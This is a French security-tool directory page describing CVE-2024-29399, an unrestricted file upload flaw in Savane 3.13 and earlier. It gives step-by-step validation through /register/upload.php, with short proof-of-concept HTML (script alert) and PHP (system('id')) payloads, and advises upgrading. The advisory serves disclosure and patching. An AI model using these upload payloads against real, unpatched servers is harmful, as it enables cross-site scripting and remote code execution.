Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-29399 — CVE-2024-29399 référence | Kitploit
Outils/GitHubGitHub/ally-petitt/cve-2024-29399
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubally-petitt/cve-2024-29399

CVE-2024-29399

CVE-2024-29399 référence

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Détails de la vulnérabilité CVE-2024-29399

Aperçu

Dans Savane v3.13 et versions antérieures, un manque de validation des fichiers téléchargés peut permettre une escalade de privilèges. Les serveurs web configurés selon les instructions d'installation sont vulnérables au Cross-Site Scripting (XSS). Dans les serveurs web mal configurés, cela peut conduire à une exécution de code à distance (RCE).

Classification CWE : CWE-434: Téléchargement sans restriction de fichier de type dangereux

Signalé par : Ally Petitt

Produit concerné : Savane

Versions concernées : 3.13 et antérieures

Étapes de validation

  1. Visitez /register/upload.php dans le navigateur.
  2. Téléchargez un fichier malveillant. Il peut s'agir, sans s'y limiter, d'un fichier HTML ou PHP selon la configuration du serveur web (voir Aperçu). Des exemples de chacun sont présentés ci-dessous :

PoC.html

root@kitploit:~
<script>
  alert("XSS");
</script>

PoC.php

root@kitploit:~
<?php
  echo system("id");
?>
  1. Visitez le lien affiché vers le fichier téléchargé pour déclencher l'exécution du code.

Atténuation

Mettez à niveau vers Savane version 3.14 ou supérieure. Le correctif se trouve ici.

Télécharger l’outil